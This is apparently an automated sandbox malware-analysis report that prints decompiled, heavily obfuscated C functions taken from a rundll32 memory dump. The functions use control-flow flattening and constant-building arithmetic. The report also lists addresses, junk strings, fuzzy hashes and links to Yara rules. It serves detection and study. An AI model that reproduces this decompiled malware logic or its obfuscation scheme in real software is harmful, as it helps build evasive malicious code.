				_v668 = _v668 ^ 0x4751bfac;
				_v652 = 0x7c78;
				_t258 = 0x4c;
				_v652 = _v652 / _t258;
				_v652 = _v652 ^ 0x3b31093c;
				_v652 = _v652 ^ 0x3b31089c;
				do {
					while(_t282 != 0xc4cab9f) {
						if(_t282 == 0x1828ae29) {
							_t242 = E001F8C0C(_v624, __eflags, _v644, _v616,  &_v524);
							_t289 =  &(_t289[3]);
							__eflags = _t242;
							if(__eflags == 0) {
								L11:
								return _t250;
							}
							_t282 = 0x19f95bd8;
							continue;
						}
						if(_t282 == 0x19809088) {
							_t282 = 0x1828ae29;
							continue;
						}
						if(_t282 == 0x19f95bd8) {
							_t278 = _v596;
							_t281 = E001F492A(_v652, _t278, _v664, _v632, _v648, _v652, _v640, _v592, _v652,  &_v524, _t250, _v680, _v604, _v600);
							_t289 =  &(_t289[0xc]);
							__eflags = _t281 - 0xffffffff;
							if(__eflags == 0) {
								goto L11;
							}
							_t282 = 0x27d5d232;
							continue;
						}
						if(_t282 == 0x27d5d232) {
							_t247 = E002053AE(_v656, _v636, _v620, _t258, _t281, _v608,  &_v564);
							_t258 = _t281;
							_t278 = _v684;
							asm("sbb esi, esi");
							_t282 = ( ~_t247 & 0xfed365d9) + 0xd7945c6;
							E001F78F0(_t281, _t278, _v660, _v612, _v676);
							_t289 =  &(_t289[9]);
							goto L19;
						}
						if(_t282 != 0x32ff9f3c) {
							goto L19;
						}
						_t249 = E001F23BC();
						_t287 = _v588 - _v548;
						asm("sbb ecx, [esp+0x9c]");
						_t297 = _v584 - _t278;
						if(_t297 >= 0 && (_t297 > 0 || _t287 >= _t249)) {
							_t250 = 1;
						}
						goto L11;
					}
					E00202092(_v628,  &_v588, _v672, _v668);
					_pop(_t258);
					_t282 = 0x32ff9f3c;
					L19:
					__eflags = _t282 - 0xd7945c6;
				} while (__eflags != 0);
				goto L11;
			}

0x002037f4
0x002037fa
0x0020380e
0x0020380f
0x00203813
0x00203816
0x00203817
0x0020381c
0x0020381d
0x00203825
0x0020382a
0x00203832
0x0020383a
0x00203847
0x0020384b
0x00203853
0x00203863
0x00203867
0x0020386f
0x00203877
0x0020387c
0x00203884
0x0020388c
0x00203894
0x0020389c
0x002038a4
0x002038ac
0x002038b1
0x002038b9
0x002038c1
0x002038c9
0x002038d1
0x002038d9
0x002038e1
0x002038ed
0x002038f2
0x002038f8
0x00203900
0x00203908
0x00203910
0x00203918
0x00203920
0x0020392d
0x00203930
0x00203934
0x00203939
0x0020393e
0x00203946
0x00203954
0x00203958
0x00203960
0x00203968
0x00203970
0x00203978
0x00203985
0x00203989
0x00203991
0x0020399b
0x002039a7
0x002039ac
0x002039b2
0x002039bc
0x002039c4
0x002039cc
0x002039d4
0x002039dc
0x002039e4
0x002039ec
0x002039f4
0x002039fc
0x00203a04
0x00203a10
0x00203a15
0x00203a1b
0x00203a23
0x00203a2b
0x00203a33
0x00203a3b
0x00203a43
0x00203a4b
0x00203a50
0x00203a58
0x00203a60
0x00203a65
0x00203a6d
0x00203a75
0x00203a7d
0x00203a85
0x00203a92
0x00203a95
0x00203a99
0x00203a9d
0x00203aa5
0x00203aad
0x00203aba
0x00203abe
0x00203ac6
0x00203ace
0x00203ad6
0x00203adb
0x00203ae3
0x00203aeb
0x00203af7
0x00203afa
0x00203afe
0x00203b06
0x00203b0e
0x00203b0e
0x00203b1c
0x00203c44
0x00203c49
0x00203c4c
0x00203c4e
0x00203b79
0x00203b82
0x00203b82
0x00203c54
0x00000000
0x00203c54
0x00203b28
0x00203c29
0x00000000
0x00203c29
0x00203b34
0x00203c01
0x00203c11
0x00203c13
0x00203c16
0x00203c19
0x00000000
0x00000000
0x00203c1f
0x00000000
0x00203c1f
0x00203b40
0x00203b9d
0x00203ba8
0x00203bb4
0x00203bb8
0x00203bc0
0x00203bc6
0x00203bcb
0x00000000
0x00203bcb
0x00203b48
0x00000000
0x00000000
0x00203b4e
0x00203b57
0x00203b62
0x00203b69
0x00203b6b
0x00203b75
0x00203b75
0x00000000
0x00203b6b
0x00203c6e
0x00203c74
0x00203c75
0x00203c7a
0x00203c7a
0x00203c7a
0x00000000

Strings

X][, xrefs: 00203970
x|, xrefs: 00203AEB
h,, xrefs: 00203A50
2?, xrefs: 002039E4
Ra, xrefs: 00203ACE
<1;, xrefs: 00203AFE
-', xrefs: 00203853
}hMl, xrefs: 00203AC6
Rd, xrefs: 00203A9D

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -'$2?$<1;$Ra$X][$h,$x|$}hMl$Rd
API String ID: 0-2401909234
Opcode ID: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
Instruction ID: efcc390e77fe5e6b8cfe9df2406d23b8f3afb40144163d4025b7c2aed364a631
Opcode Fuzzy Hash: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
Instruction Fuzzy Hash: 7AB141725183809FE368CF25C48A95BFBE2FBC4358F104A1DF595962A0D7B68A18CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00205115, Relevance: 11.4, Strings: 9, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00205115() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t125;
				void* _t126;
				signed int _t138;
				signed int _t139;
				intOrPtr _t141;
				signed int _t143;
				signed int* _t144;

				_t144 =  &_v568;
				_v528 = 0x5aebe;
				_t141 = 0;
				_t126 = 0xdd78c1f;
				_v524 = 0;
				_v568 = 0xe0a6;
				_v568 = _v568 + 0xefcc;
				_v568 = _v568 >> 3;
				_v568 = _v568 + 0xffffba73;
				_v568 = _v568 ^ 0xfffff0ad;
				_v564 = 0x6b83;
				_t138 = 0x25;
				_v564 = _v564 / _t138;
				_v564 = _v564 << 2;
				_v564 = _v564 >> 2;
				_v564 = _v564 ^ 0x0000048b;
				_v556 = 0xe5d8;
				_t139 = 0x1f;
				_v556 = _v556 * 0x31;
				_v556 = _v556 ^ 0x577859bf;
				_v556 = _v556 / _t139;
				_v556 = _v556 ^ 0x02d16e7d;
				_v552 = 0x540d;
				_v552 = _v552 * 0x44;
				_v552 = _v552 * 0x6c;
				_v552 = _v552 + 0xffff4b52;
				_v552 = _v552 ^ 0x096ab6e1;
				_v548 = 0x2240;
				_v548 = _v548 | 0x13356285;
				_v548 = _v548 ^ 0x133520ec;
				_v560 = 0x478b;
				_v560 = _v560 >> 4;
				_v560 = _v560 + 0x6d64;
				_v560 = _v560 + 0xffffa9cd;
				_v560 = _v560 ^ 0x00004ab1;
				_v532 = 0x9667;
				_v532 = _v532 << 4;
				_v532 = _v532 ^ 0x00090457;
				_t140 = _v548;
				_t143 = _v548;
				_t125 = _v548;
				_v540 = 0x3ff9;
				_v540 = _v540 * 0x59;
				_v540 = _v540 | 0xbbcf382b;
				_v540 = _v540 ^ 0xbbdf4460;
				_v536 = 0x71ad;
				_v536 = _v536 ^ 0xa8de0853;
				_v536 = _v536 ^ 0xa8de4efe;
				_v544 = 0x526a;
				_v544 = _v544 | 0x2fe28bf9;
				_v544 = _v544 ^ 0x2fe2ff10;
				do {
					while(_t126 != 0xdd78c1f) {
						if(_t126 == 0x116c8390) {
							_t117 = E001F929E();
							_t140 = _t117;
							__eflags = _t117;
							if(__eflags == 0) {
								L9:
								return _t141;
							}
							_t126 = 0x1a95d21f;
							continue;
						}
						if(_t126 == 0x1326aa4f) {
							_t120 = E001F1E13(_v548, _v560, _v532, _v540,  &_v520);
							_t144 =  &(_t144[3]);
							_t143 = _t120;
							_t126 = 0x217dee79;
							continue;
						}
						if(_t126 == 0x1a95d21f) {
							_t122 = E001FD44C(_t140, _v564, __eflags, _t126,  &_v520, _v556, _v552);
							_t144 =  &(_t144[4]);
							__eflags = _t122;
							if(__eflags == 0) {
								goto L9;
							}
							_t126 = 0x1326aa4f;
							continue;
						}
						if(_t126 == 0x217dee79) {
							_t125 = E0020C424(_t143, _v544);
							_t126 = 0x3152545d;
							continue;
						}
						if(_t126 != 0x3152545d) {
							goto L17;
						}
						_v568 = 0x3661;
						_v568 = _v568 << 0xe;
						_v568 = _v568 * 5;
						_v568 = _v568 + 0xbb88;
						_v568 = _v568 ^ 0x69defb6a;
						if(_t125 == _v568) {
							_t141 = 1;
						}
						goto L9;
					}
					_t126 = 0x116c8390;
					L17:
					__eflags = _t126 - 0x64d23cb;
				} while (__eflags != 0);
				goto L9;
			}

0x00205115
0x0020511b
0x00205128
0x0020512a
0x0020512f
0x00205133
0x0020513b
0x00205143
0x00205148
0x00205150
0x00205158
0x00205167
0x0020516c
0x00205172
0x00205177
0x0020517c
0x00205184
0x00205191
0x00205192
0x00205196
0x002051a4
0x002051a8
0x002051b0
0x002051bd
0x002051c6
0x002051ca
0x002051d2
0x002051da
0x002051e2
0x002051ea
0x002051f2
0x002051fa
0x002051ff
0x00205207
0x0020520f
0x00205217
0x0020521f
0x00205224
0x0020522c
0x00205230
0x00205234
0x00205238
0x00205245
0x00205249
0x00205251
0x00205259
0x00205261
0x00205269
0x00205271
0x00205279
0x00205281
0x00205289
0x00205289
0x0020529b
0x00205378
0x0020537d
0x0020537f
0x00205381
0x002052f9
0x00205304
0x00205304
0x00205387
0x00000000
0x00205387
0x002052a7
0x00205360
0x00205365
0x00205368
0x0020536a
0x00000000
0x0020536a
0x002052b3
0x00205335
0x0020533a
0x0020533d
0x0020533f
0x00000000
0x00000000
0x00205341
0x00000000
0x00205341
0x002052bb
0x00205315
0x00205317
0x00000000
0x00205317
0x002052c3
0x00000000
0x00000000
0x002052c9
0x002052d1
0x002052db
0x002052df
0x002052e7
0x002052f3
0x002052f7
0x002052f7
0x00000000
0x002052f3
0x00205391
0x00205396
0x00205396
0x00205396
0x00000000

Strings

dm, xrefs: 002051FF
T, xrefs: 002051B0
y}!, xrefs: 002052B5
a6, xrefs: 002052C9
y}!, xrefs: 0020536A
jR, xrefs: 00205271
]TR1, xrefs: 00205317
@", xrefs: 002051DA
]TR1, xrefs: 002052BD

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T$@"$]TR1$]TR1$a6$dm$jR$y}!$y}!
API String ID: 0-2886613653
Opcode ID: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
Instruction ID: eb949d8ceddc5cfe3f96826b5cd94d39fa1fdd98ea54828e80be104e94494990
Opcode Fuzzy Hash: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
Instruction Fuzzy Hash: E75176711183428FD354CF24C48542FFBE0BFC8758F104A1EF9A6962A1D3B8CA598F82

Uniqueness

Uniqueness Score: -1.00%

Function 002A4689, Relevance: 11.4, Strings: 9, Instructions: 139COMMON

Download Yara Rule

Strings

]TR1, xrefs: 002A4831
a6, xrefs: 002A483D
y}!, xrefs: 002A4829
jR, xrefs: 002A47E5
T, xrefs: 002A4724
@", xrefs: 002A474E
y}!, xrefs: 002A48DE
]TR1, xrefs: 002A488B
dm, xrefs: 002A4773

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T$@"$]TR1$]TR1$a6$dm$jR$y}!$y}!
API String ID: 0-2886613653
Opcode ID: eb64263ff597281146e1fcc2df18b02862a53c27313861b45d44eba95c40690f
Instruction ID: 7c4b7354d9a74979059cf9de4e20d83389c09f814595a56b0500afd28558aa4c
Opcode Fuzzy Hash: eb64263ff597281146e1fcc2df18b02862a53c27313861b45d44eba95c40690f
Instruction Fuzzy Hash: 285156711183828FD354DF25C88541FFBE1BBC9718F104A1EF5AA96260DBB8CA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 001F2DEE, Relevance: 10.3, Strings: 8, Instructions: 299
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E001F2DEE(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				unsigned int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				intOrPtr _t312;
				intOrPtr _t315;
				signed int _t317;
				signed int _t328;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				void* _t340;
				signed int _t376;
				void* _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int* _t385;

				_t385 =  &_v1676;
				_v1652 = 0xab2a;
				_v1652 = _v1652 + 0xffff495e;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 * 0x69;
				_t384 = __edx;
				_v1652 = _v1652 ^ 0xfed2f229;
				_v1584 = 0x9d53;
				_t328 = __ecx;
				_v1584 = _v1584 + 0xa330;
				_t377 = 0xee39a7c;
				_v1584 = _v1584 ^ 0x000172e7;
				_v1592 = 0xcdb9;
				_t330 = 0x11;
				_v1592 = _v1592 * 0x36;
				_v1592 = _v1592 ^ 0x002b5ef0;
				_v1576 = 0x10e6;
				_v1576 = _v1576 ^ 0xbdc8c8ad;
				_v1576 = _v1576 ^ 0xbdc8e062;
				_v1616 = 0x2d0;
				_v1616 = _v1616 << 2;
				_v1616 = _v1616 >> 4;
				_v1616 = _v1616 ^ 0x00001000;
				_v1564 = 0x56a7;
				_v1564 = _v1564 / _t330;
				_v1564 = _v1564 ^ 0x000075e6;
				_v1668 = 0x8a0a;
				_v1668 = _v1668 ^ 0xf9b8a5a3;
				_v1668 = _v1668 >> 4;
				_v1668 = _v1668 << 8;
				_v1668 = _v1668 ^ 0x9b82d072;
				_v1608 = 0x1b3c;
				_v1608 = _v1608 << 3;
				_t331 = 0x19;
				_v1608 = _v1608 * 0x7b;
				_v1608 = _v1608 ^ 0x006884bb;
				_v1660 = 0x34f3;
				_v1660 = _v1660 ^ 0x817c71db;
				_v1660 = _v1660 << 0xc;
				_v1660 = _v1660 + 0xee26;
				_v1660 = _v1660 ^ 0xc4532971;
				_v1636 = 0xf8a9;
				_v1636 = _v1636 | 0xff2fbebc;
				_v1636 = _v1636 * 9;
				_v1636 = _v1636 ^ 0xf8afb852;
				_v1620 = 0xbdfe;
				_v1620 = _v1620 / _t331;
				_v1620 = _v1620 + 0xcd35;
				_v1620 = _v1620 ^ 0x0000b0b7;
				_v1612 = 0xc643;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 + 0xffff2544;
				_v1612 = _v1612 ^ 0xffff1dfd;
				_v1596 = 0xa7ff;
				_v1596 = _v1596 + 0xffffdda0;
				_v1596 = _v1596 ^ 0x0000ce4c;
				_v1588 = 0x97f4;
				_v1588 = _v1588 >> 0xb;
				_v1588 = _v1588 ^ 0x00000d4c;
				_v1624 = 0xc45e;
				_t332 = 0x3c;
				_v1624 = _v1624 / _t332;
				_v1624 = _v1624 ^ 0xe4d01b6a;
				_v1624 = _v1624 ^ 0xe4d071e7;
				_v1628 = 0x92d6;
				_v1628 = _v1628 >> 2;
				_v1628 = _v1628 | 0xb4e3a315;
				_v1628 = _v1628 ^ 0xb4e38f21;
				_v1676 = 0x6ce6;
				_t333 = 0x62;
				_v1676 = _v1676 / _t333;
				_t334 = 0x5b;
				_v1676 = _v1676 * 0xb;
				_v1676 = _v1676 + 0xffffdd0c;
				_v1676 = _v1676 ^ 0xffff8d43;
				_v1568 = 0x788f;
				_v1568 = _v1568 | 0x01d52ab2;
				_v1568 = _v1568 ^ 0x01d55070;
				_v1580 = 0xac01;
				_v1580 = _v1580 | 0x939dc85b;
				_v1580 = _v1580 ^ 0x939d96e7;
				_v1644 = 0x4f10;
				_v1644 = _v1644 * 0x6c;
				_v1644 = _v1644 | 0x48f07e2e;
				_v1644 = _v1644 >> 9;
				_v1644 = _v1644 ^ 0x00245a10;
				_v1656 = 0xfccd;
				_v1656 = _v1656 ^ 0x0dc9b737;
				_v1656 = _v1656 << 8;
				_v1656 = _v1656 | 0x5beff8b5;
				_v1656 = _v1656 ^ 0xdbefe6c8;
				_v1572 = 0x60e1;
				_v1572 = _v1572 / _t334;
				_v1572 = _v1572 ^ 0x000055cd;
				_v1604 = 0x4c8;
				_t335 = 0x33;
				_v1604 = _v1604 / _t335;
				_v1604 = _v1604 ^ 0x56d62181;
				_v1604 = _v1604 ^ 0x56d60377;
				_v1664 = 0xeba7;
				_t336 = 0x75;
				_v1664 = _v1664 / _t336;
				_v1664 = _v1664 + 0x2263;
				_t337 = 0x6a;
				_v1664 = _v1664 / _t337;
				_v1664 = _v1664 ^ 0x00006206;
				_v1672 = 0xe4de;
				_v1672 = _v1672 * 6;
				_v1672 = _v1672 ^ 0xd03d2876;
				_v1672 = _v1672 ^ 0x484383cd;
				_v1672 = _v1672 ^ 0x987bff54;
				_v1632 = 0x7003;
				_v1632 = _v1632 >> 0xf;
				_v1632 = _v1632 ^ 0x6ec815ff;
				_v1632 = _v1632 + 0xffffbce8;
				_v1632 = _v1632 ^ 0x6ec7acef;
				_v1640 = 0x9135;
				_v1640 = _v1640 ^ 0x0aba72c7;
				_v1640 = _v1640 | 0xda9e3ffa;
				_t338 = 7;
				_v1640 = _v1640 / _t338;
				_v1640 = _v1640 ^ 0x1f3ffeda;
				_v1648 = 0xbacf;
				_v1648 = _v1648 >> 0xd;
				_t339 = 0x17;
				_v1648 = _v1648 / _t339;
				_v1648 = _v1648 << 0xc;
				_v1648 = _v1648 ^ 0x0000584d;
				_v1600 = 0xeac1;
				_v1600 = _v1600 * 0x77;
				_v1600 = _v1600 ^ 0x006d5ca6;
				_t376 = _v1600;
				while(_t377 != 0x5fcbc3f) {
					if(_t377 != 0xee39a7c) {
						if(_t377 == 0x11ea9c68) {
							_push( &_v520);
							_t317 = E001F2628(_t328, _t384);
							asm("sbb esi, esi");
							_t339 = 0x1f12f8;
							_t380 =  ~_t317 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t377 == 0x1790ebe1) {
								return E001F91CD(_v1632, _v1640, _v1648, _t376, _v1600);
							}
							_t394 = _t377 - 0x376b3a50;
							if(_t377 != 0x376b3a50) {
								L12:
								__eflags = _t377 - 0x7fc7711;
								if(_t377 != 0x7fc7711) {
									continue;
								} else {
									return _t317;
								}
								L16:
							} else {
								_push(_t339);
								E001F1D54(_v1576, _t339, _v1616, _v1564, _v1668,  &_v1560, _v1608, _v1652);
								_push(0x1f1368);
								_push(_v1620);
								E002063BF(E0020BF25(_v1660, _v1636, _t394), _t394, _v1596, _v1588,  &_v1040, _v1660, _v1624,  &_v1560,  &_v520, _v1628);
								E0020C5F7(_v1676, _v1568, _v1580, _v1644, _t321);
								_push(_v1672);
								_push(0);
								_push( &_v1040);
								_push(0);
								_push(_v1664);
								_push(_v1604);
								_push(0);
								_push(0);
								_t339 = _v1656;
								_t317 = E002089F6(_t339, _v1572, _t394);
								_t385 =  &(_t385[0x1d]);
								asm("sbb esi, esi");
								_t380 =  ~_t317 & 0xee6bd05e;
								L7:
								_t377 = _t380 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t340 = 0x24;
					_t315 = E002057E8(_t340);
					_t376 = _t315;
					_t339 = _t339;
					__eflags = _t376;
					if(_t376 != 0) {
						_t377 = 0x11ea9c68;
						continue;
					}
					return _t315;
					goto L16;
				}
				 *((intOrPtr*)(_t376 + 0x20)) = _t328;
				_t377 = 0x7fc7711;
				_t312 =  *0x211400; // 0x0
				 *((intOrPtr*)(_t376 + 0x10)) = _t312;
				 *0x211400 = _t376;
				goto L12;
			}

0x001f2dee
0x001f2df4
0x001f2dfc
0x001f2e04
0x001f2e12
0x001f2e16
0x001f2e18
0x001f2e22
0x001f2e2a
0x001f2e2c
0x001f2e34
0x001f2e39
0x001f2e41
0x001f2e50
0x001f2e53
0x001f2e57
0x001f2e5f
0x001f2e67
0x001f2e6f
0x001f2e77
0x001f2e7f
0x001f2e84
0x001f2e89
0x001f2e91
0x001f2ea7
0x001f2eae
0x001f2eb9
0x001f2ec1
0x001f2ec9
0x001f2ece
0x001f2ed3
0x001f2edb
0x001f2ee3
0x001f2eed
0x001f2ef0
0x001f2ef4
0x001f2efc
0x001f2f04
0x001f2f0c
0x001f2f11
0x001f2f19
0x001f2f21
0x001f2f29
0x001f2f36
0x001f2f3a
0x001f2f42
0x001f2f52
0x001f2f56
0x001f2f5e
0x001f2f66
0x001f2f6e
0x001f2f73
0x001f2f7b
0x001f2f83
0x001f2f8b
0x001f2f93
0x001f2f9b
0x001f2fa3
0x001f2fa8
0x001f2fb0
0x001f2fbc
0x001f2fbf
0x001f2fc3
0x001f2fcd
0x001f2fd5
0x001f2fdd
0x001f2fe2
0x001f2fea
0x001f2ff2
0x001f3000
0x001f3005
0x001f3010
0x001f3013
0x001f3017
0x001f301f
0x001f3027
0x001f3032
0x001f303d
0x001f3048
0x001f3050
0x001f3058
0x001f3060
0x001f306d
0x001f3071
0x001f3079
0x001f307e
0x001f3086
0x001f308e
0x001f3096
0x001f309b
0x001f30a3
0x001f30ab
0x001f30bb
0x001f30bf
0x001f30c7
0x001f30d3
0x001f30d8
0x001f30de
0x001f30e6
0x001f30ee
0x001f30fa
0x001f30ff
0x001f3105
0x001f3111
0x001f3114
0x001f3118
0x001f3120
0x001f312d
0x001f3131
0x001f3139
0x001f3141
0x001f3149
0x001f3151
0x001f3156
0x001f315e
0x001f3166
0x001f316e
0x001f3176
0x001f317e
0x001f318e
0x001f3193
0x001f3199
0x001f31a1
0x001f31a9
0x001f31b2
0x001f31b5
0x001f31b9
0x001f31be
0x001f31c6
0x001f31d3
0x001f31d7
0x001f31df
0x001f31e3
0x001f31f5
0x001f3201
0x001f330a
0x001f3312
0x001f331c
0x001f331e
0x001f331f
0x00000000
0x001f3207
0x001f320d
0x00000000
0x001f3383
0x001f3213
0x001f3219
0x001f335f
0x001f335f
0x001f3365
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001f321f
0x001f321f
0x001f3247
0x001f324c
0x001f3251
0x001f3299
0x001f32b5
0x001f32c6
0x001f32ca
0x001f32cb
0x001f32cc
0x001f32cd
0x001f32d1
0x001f32dc
0x001f32dd
0x001f32de
0x001f32e2
0x001f32e7
0x001f32ee
0x001f32f0
0x001f32f6
0x001f32f6
0x00000000
0x001f32f6
0x001f3219
0x001f3201
0x001f3332
0x001f3333
0x001f3338
0x001f333a
0x001f333b
0x001f333d
0x001f333f
0x00000000
0x001f333f
0x001f3390
0x00000000
0x001f3390
0x001f3349
0x001f334c
0x001f3351
0x001f3356
0x001f3359
0x00000000

Strings

u, xrefs: 001F2EAE
l, xrefs: 001F2FF2
L, xrefs: 001F2FA8
c", xrefs: 001F3105
MX, xrefs: 001F31BE
P:k7, xrefs: 001F3213
&, xrefs: 001F2F11
`, xrefs: 001F30AB

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &$L$MX$P:k7$c"$`$l$u
API String ID: 0-1688440420
Opcode ID: e7c020491e417241adf8423013a13ebd13589992d5eddd52ae9a6369b1e31003
Instruction ID: 630830f686df7f7f151b95df5c1dd73289db5d473f31a3a88ec782b331fc8dd4
Opcode Fuzzy Hash: e7c020491e417241adf8423013a13ebd13589992d5eddd52ae9a6369b1e31003
Instruction Fuzzy Hash: F1E131725083419FE368CF25C98A95BFBF1BBC4748F108A1DF1A59A2A0D7B59909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00292362, Relevance: 10.3, Strings: 8, Instructions: 299COMMON

Download Yara Rule

Strings

P:k7, xrefs: 00292787
`, xrefs: 0029261F
&, xrefs: 00292485
L, xrefs: 0029251C
c", xrefs: 00292679
l, xrefs: 00292566
MX, xrefs: 00292732
u, xrefs: 00292422

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &$L$MX$P:k7$c"$`$l$u
API String ID: 0-1688440420
Opcode ID: dc581d52e15b681bf47c5c3fb8685690f88780bafd1f43cf46e0153a02564143
Instruction ID: 2721a1a2430a9bc3ee3d9f9814bfc5f789f1f3eb9ca93191a9435ff97918c31f
Opcode Fuzzy Hash: dc581d52e15b681bf47c5c3fb8685690f88780bafd1f43cf46e0153a02564143
Instruction Fuzzy Hash: BBE14272508341AFE368CF65C88A94BFBF1FBC4708F10891DF1A98A260D7B59919CF42

Uniqueness

Uniqueness Score: -1.00%

Function 001F1658, Relevance: 10.3, Strings: 8, Instructions: 285
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001F1658(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t280;
				intOrPtr* _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				void* _t313;
				intOrPtr* _t337;
				void* _t338;
				void* _t341;
				signed int* _t342;

				_t342 =  &_v112;
				_v76 = 0x33fd;
				_v76 = _v76 + 0xc49f;
				_v76 = _v76 * 0x29;
				_t341 = __edx;
				_v76 = _v76 ^ 0x0027ed19;
				_v32 = 0xcc47;
				_t292 = __ecx;
				_t337 = 0;
				_t294 = 0x55;
				_v32 = _v32 / _t294;
				_v32 = _v32 ^ 0x00006db6;
				_t338 = 0x2fa674f5;
				_v72 = 0x6a0a;
				_v72 = _v72 + 0xffff61af;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0000c658;
				_v28 = 0xdc12;
				_v28 = _v28 + 0xffffa614;
				_v28 = _v28 ^ 0x0000bab7;
				_v64 = 0x618;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0xcf790140;
				_v64 = _v64 ^ 0xcf796a5a;
				_v108 = 0x7f72;
				_t295 = 0xe;
				_v108 = _v108 * 0x4b;
				_v108 = _v108 | 0xd60feb69;
				_v108 = _v108 ^ 0xd62f8cb3;
				_v112 = 0x24c;
				_v112 = _v112 / _t295;
				_v112 = _v112 | 0xf1ea6f15;
				_v112 = _v112 * 5;
				_v112 = _v112 ^ 0xb9941bfd;
				_v68 = 0xf170;
				_v68 = _v68 | 0xaf46648c;
				_v68 = _v68 ^ 0xc1ce5702;
				_v68 = _v68 ^ 0x6e88e0f6;
				_v20 = 0xb551;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x001a3386;
				_v24 = 0x298e;
				_v24 = _v24 * 0x76;
				_v24 = _v24 ^ 0x001331c5;
				_v60 = 0x8d97;
				_v60 = _v60 >> 2;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x0000628a;
				_v104 = 0x3b43;
				_v104 = _v104 >> 0xb;
				_v104 = _v104 + 0x60ed;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x060f18e7;
				_v56 = 0x22a0;
				_v56 = _v56 << 0xa;
				_v56 = _v56 | 0xb5955f6a;
				_v56 = _v56 ^ 0xb59ff508;
				_v96 = 0xc755;
				_v96 = _v96 + 0xffff502d;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x00007dd0;
				_v100 = 0xa33d;
				_t296 = 0x22;
				_v100 = _v100 / _t296;
				_t297 = 0x28;
				_v100 = _v100 * 0x21;
